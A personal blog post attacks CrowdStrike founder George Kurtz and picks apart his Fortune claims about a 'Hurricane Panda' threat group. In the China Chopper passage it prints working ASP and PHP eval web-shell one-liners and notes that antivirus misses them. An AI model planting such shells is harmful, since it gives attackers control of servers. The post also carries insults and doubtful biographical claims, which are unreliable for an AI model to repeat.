Showing posts with label MS14-058. Show all posts
Showing posts with label MS14-058. Show all posts

Saturday, August 1, 2015

CrowdStrike founder George Kurtz made some outrageous claims in Fortune Magazine this week

George Kurtz has quite the resume. Perhaps you remember the time he spent at McAfee, a company founded by a drug-addled heavily-armed lunatic and maybe murderer whose recent contributions to infosec include being one of the handful of companies to use BSAFE encryption library in their products, the library famously back-doored by government security contractors/prostitutes RSA for a National Security Agency check in the amount of $10 million. Or perhaps you arm more familiar with his time as Chief Financial Officer of General Motors, whose flagship "IT" product, OnStar, is best known to actual security researchers as the government tracking device that allows police to disable your car remotely and quite likely kill you in the process. Did I say police? Because I meant basically anybody who has a computer and can read. And did I say disable? Because I also meant unlock the car and start the engine.

George Kurtz is to the information technology community what Bull Connor was to the civil rights community. Which is to say: not helpful.
joshua wieder crowdstrike george kurtz
This photo is b+w to spare you from Mr Kurtz' ginger goatee
Look, I am being unfair. Just because George Kurtz was the most senior IT official at these companies who happened to make these corporate decisions to willfully defecate on the basic expectations of service of their customers - information security at Mcafee and not becoming a splat on the highway at GM thanks to the whims of a 13 year old with emotional problems who can't get a thrill from World of Warcraft anymore - doesn't mean that George Kurtz is not what he bills himself as: an "internationally recognized security expert". I am sure that many people would believe this about George Kurtz all over the planet. Specifically, those people would be those who have never heard of and know nothing about George Kurtz or his career. There are billions of people world-wide that meet that criteria.

He also regularly uses the word "cyber" without a hint of irony, for example to announce new hires. "FBI's Top Cyber Lawyer Steven Chabinsky Joins CrowdStrike" "Former FBI Top Cyber Cop Shawn Henry joins as CrowdStrike Services President" ... all on his personal website called Security Battlefield that has a picture of a little army man for a logo.
blog josh wieder security battlefield
Is this a backlit GI Joe being hit with a firecracker?
But this post isn't about the general tom-foolery that Mr Kurtz engages in. No, this is about a specific series of ridiculous claims made by Kurtz and parroted from the rooftops by  Fortune magazine, like this:
"CEO and co-founder George Kurtz tells it like this: A besieged customer needed backup. So Kurtz’s team sent in reinforcements, placed its cloud-based software sensors across the breached business’s computing environment, and started gathering intel. Aha! Investigators spotted Hurricane Panda, an old Chinese nemesis that Kurtz’s crew had been battling since 2013. What happened next surprised them: When the attackers scanned an infected machine only to find traces of CrowdStrike, they fled."
aaaand this:
"'These fraudsters used to work a street corner—they had a geographic area of stealing and limited scalability,' Kurtz says. 'Now, because of the cloud, they can scale exponentially—no longer a street corner but the entire globe.'"
In two paragraphs in the article, the word "cloud" appears in every sentence. Replacing the word "cloud" with a word like "sorcery" provides a clearer understanding of the three card Monte game that Kurtz and people like him play with competency. 

    "[sorcery] is essential to CrowdStrike’s success" 
    "[sorcery] also allows for rapid deployment" 
    "because of [sorcery], they can scale exponentially" 

You are led to believe that competency is underneath one of the cups; but its not. Let's unpack these claims, starting with the first quote. There are at least six separate factual claims in this quote: 

    1. "A besieged customer needed backup"
    2. "Kurtz’s team sent in reinforcements"
    3. "placed its cloud-based software sensors across the breached business’s computing
    4. "and gathered intel"
    5. "Investigators spotted Hurricane Panda, an old Chinese nemesis that Kurtz’s crew had been
         battling since 2013"
    6. "When the attackers scanned an infected machine only to find traces of CrowdStrike, they fled"

When I say these statements are factual claims, I mean they are statements that are either true or false; furthermore I mean that evidence could be supplied to support these claims. Unfortunately, Fortune Magazine did not publish any follow up questions about this series of factual claims, and no evidence was supplied. It is my contention that, in the absence of convincing evidence, a few of these claims are reasonable to accept at face value, but most of them stretch the outer bounds of credulity. While Fortune Magazine didn't bother to fact check their article, CrowdStrike did explain the justification for some of these claims on their own blog and in other interviews. We will look at those.

    1. "A besieged customer needed backup"

This is a reasonable claim. CrowdStrike has customers, it is easy to accept the idea that one of those customers contacted CrowdStrike for some sort of service. 

There are some early warning signs though. The name of the customer is not mentioned, and although we can accept that an NDA exists we have to wonder about that agreement in more detail. If the customer wanted Kurtz telling the newspapers about how an attack was successfully resolved, which is not as rare a scenario as it might seem given the ethical and legal implications of large corporations sweeping such attacks under the rug, why didn't the customer join Kurtz to discuss the story with Fortune or other news organizations - or at the very least let Kurtz use the name of the customer as a case study? On the other side of this coin, if the customer did not want a nondisclosure exemption, then why is Kurtz talking to Fortune magazine about the details of an attack that would almost certainly be covered under even the lamest of NDAs?

That's not the only problem. Since Kurtz is alright with playing games with his customers' privacy, why not specifically state what this "siege" was? The most basic details of such an attack would lend credibility without revealing additional customer information. Was this a DOS? SQLi? XSS? Someone going after the email servers? Or did these servers encounter the sort of network scanning that every server connected to the internet does every day?

    2. "Kurtz’s team sent in reinforcements"

Another reasonable claim on its face, that again raises questions. Who was the reinforcements? If Kurtz doesn't trust his employees enough to identify them when their genius results in a complete victory over terrifying foreigners like "Hurricane Panda", why should CrowdStrike's customers provide them with access to their most sensitive network infrastructure?

    3. "placed its cloud-based software sensors across the breached business’s computing

Here we have the first use of the word "cloud". Despite the idiocy of riding a media buzzword horse that has been dead for well over five years, I am again willing to accept this claim at face value without further information. The use of "breached" in the past tense seems to provide us at least a little bit more information than we had previously, but the clarification is chimerical. Does "breach" mean something like a rootkit, or does "breach" mean someone mapped part of the customer's private network using IGMP discovery

    4. "and gathered intel"

Normal human beings word refer to this as reviewed log data. Once more it is not unreasonable to give Kurtz the benefit of the doubt here.

    5. "Investigators spotted Hurricane Panda, an old Chinese nemesis that Kurtz’s crew had been battling since 2013"

So this is where the real problems begin to start. The problem is this simple and straight-forward. "Hurricane Panda" does not exist. Let's unpack that.

Not everyone that works at CrowdStrike is a schmuck. As far as I can tell, CrowdStrike's irascible schmuckiness is isolated to the management, marketing, sales and legal. I am fairly confident that there is at least one competent tech employee at CrowdStrike. I am confident of this because CrowdStrike played some role in the discovery of one '0 day' exploit: CVE-2014-4113 (I've also been told a few of their tech guys have made a few decent tools available, like Tortilla, that I haven't tried yet ... this really isn't intended as an FU to the guys shoveling the coal at Crowdstrike, any more than mocking the Facebook guy's latest evil plot would be a slight to the guys shoveling coal at Facebook ... please consult the Death Start contractors conversation from the film Clerks for more information )

CrowdStrike's exact role in this discovery is unclear, because another group called FireEye was also credited with the discovery of the vulnerability. While FireEye itself is not free on controversy, there is simply no comparison between FireEye and CrowdStrike when it comes to security research. FireEye's $1 billion acquisition of Mandiant brought a lot of smart people to the team, and I am aware of at least 16 zero day exploits that FireEye has published. 16 > 1.

In response to CVE-2014-4113, Microsoft released a patch, MS14-058. Microsoft credits both CrowdStrike and FireEye in their post outlining MS14-058 (as well as crediting FireEye for a second 0-day addressed in the patch, CVE-2014-4148, which used malware embedded in TrueType font files). Neither Microsoft or FireEye makes any mention of a single organizaed group behind the release of CVE-2014-4113 (the ridiculous Hurricane Panda name was dreamed up without rhyme or reason by CrowdStrike ... perhaps because panda bears come from China?). In fact, FireEye's blog post explaining their work on both exploits, released on the same day as CrowdStrike's fantastical panda story, goes out of their way to state that they believe that CVE-2014-4113 was not the work of a single group (emphasis mine):

"The tool appears to have gone through at least three iterations over time. The initial tool and exploits is believed to have had limited availability, and may have been employed by a handful of distinct attack groups. As the exploited vulnerability was remediated, someone with access to the tool modified it to use a newer exploit when one became available. These two newer versions likely did not achieve the widespread distribution that the original tool/exploits did and may have been retained privately, not necessarily even by the same actors."

The point here is clear. FireEye admits that the use of CVE-2014-4113 was limited, but was not owned by a single group. So what evidence does CrowdStrike provide to dispute the findings of their much more experienced and respected co-publisher? According to CrowdStrike, Panda attacks can be identified through their use of:

    A. The PlugX remote access tool

Why is this bullshit? AlienVault identified the author of PlugX in September of 2012 as a developer working for Chinansl Technology Co., Ltd with the email address (feel free to scrape and spam that address y'all) and a face only a mother could love. No Pandas were included on this man's baidu profile.
plugX joshua wieder whg0001
HE's free DNS service is free, famously insecure and used by many, many people. This is like using Firefox users as an identifier. It's meaningless.

Finally, badass admin Keith Tyler broke the China Chopper story to the English speaking world in late 2012. A little under a year later, FireEye release a two part series (one & two) expanding on Tyler's work. Both of these posts contained the source code for the China Chopper client and a link to the domain where the software was available for download. Now, three years later, China Chopper is understood to be widely used. The client for the shell is an amazing 4kb on disk and is extremely difficult to identify as malicious:


<%@ Page Language="Jscript"%><%eval(Request.Item[”password"],"unsafe");%>

On Apache:

<?php @eval($_POST['password']);?>

The odds of finding that in a giant godawful mess like Drupal or something is slim unless you know what you are looking for. That is why it is in use all over the place - it's great, it won't be detected by antivirus, and its still not widely known. As with HE DNS, finding this proves nothing because this is a popular means of attack.

    6. "When the attackers scanned an infected machine only to find traces of CrowdStrike, they fled"

This is the claim that compelled me to write this post. There is so much wrong with this. Fundamentally the statement is a cum hoc ergo propter hoc logical fallacy. Even if we take Kurtz at his word, that an attack of some kind was ongoing, that CrowdStrike installed software, and the attack then stopped, this, on its own, does not prove that CrowdStrike's presence caused the attack to stop. Even though the CrowdStrike install and the attack ceasing are correlated, this relationship does not imply causation.

The red flag that nonsense is occurring is amplified by the use of the word "fled". The word speaks to the state of mind of the supposed attackers, because to flee presupposes fear. The state of mind for these attackers is unknowable to Kurtz or CrowdStrike. Again if we take Kurtz at his word that an attack was ongoing, how could he know the attackers did not stop once they realized that someone, anyone, was logged into the server; or more realistically, that a human being was behind the supposed "attack", rather than a bot.

Remember back in #1 how we pointed out it was suspicious that Kurtz did not specify what kind of attack it was? That concern becomes much more important here in the sixth claim. Without an understanding of what kind of 'attack' this was, how can we determine why the attack stopped; or that, in fact, an attack had occurred at all? Network scanning, even aggressive network scanning, is a fact of life on the internet. Every server with an internet connection will be scanned by multiple hosts, multiple times, every day. Such scanning can abruptly stop for a number of reasons - the most common is such scans look for a small set of software vulnerabilities and when they don't find it, they move on. Kurt's story fits hand in glove with this sort of common behavior.

One last claim as we wrap this up:
"'These fraudsters used to work a street corner—they had a geographic area of stealing and limited scalability,' Kurtz says. 'Now, because of the cloud, they can scale exponentially—no longer a street corner but the entire globe.'"
The 'Cloud' has not had any impact on the tactics used to break into other people's computers, at least not in any way resembling what Kurtz described here. Botnets existed before virtualization became ubiquitous. The theories driving DDoS and spam remain unchanged even as individual exploits continue to be patched in older software and uncovered in newer software. The notion that those breaking into other computers are bound by a geographic area has always been false. It is so obviously and demonstrably false that it is difficult to begin to respond. Such a statement betrays a breathtaking lack of understanding about the history of the internet and the malicious use of computers. Some of the first people to break into NASA were from Australia. East German teenagers were among the first hackers to break into US military servers. Neither group was identified or bound by anything having to do with server architecture but by monitoring of telco traffic.

It is difficult to see what the readers of Fortune Magazine gain from the publication of long-winded, credulous, fact-free interviews. Furthermore, George Kurtz does a dis-service to the customers of CrowdStrike as well as his own technical employees by speaking so incompetently about the field his company seeks to compete in.

RAT Bastard

Earlier this week, several servers I maintain were targeted by automated attempts to upload a remote access trojan (RAT). The RAT is a simpl...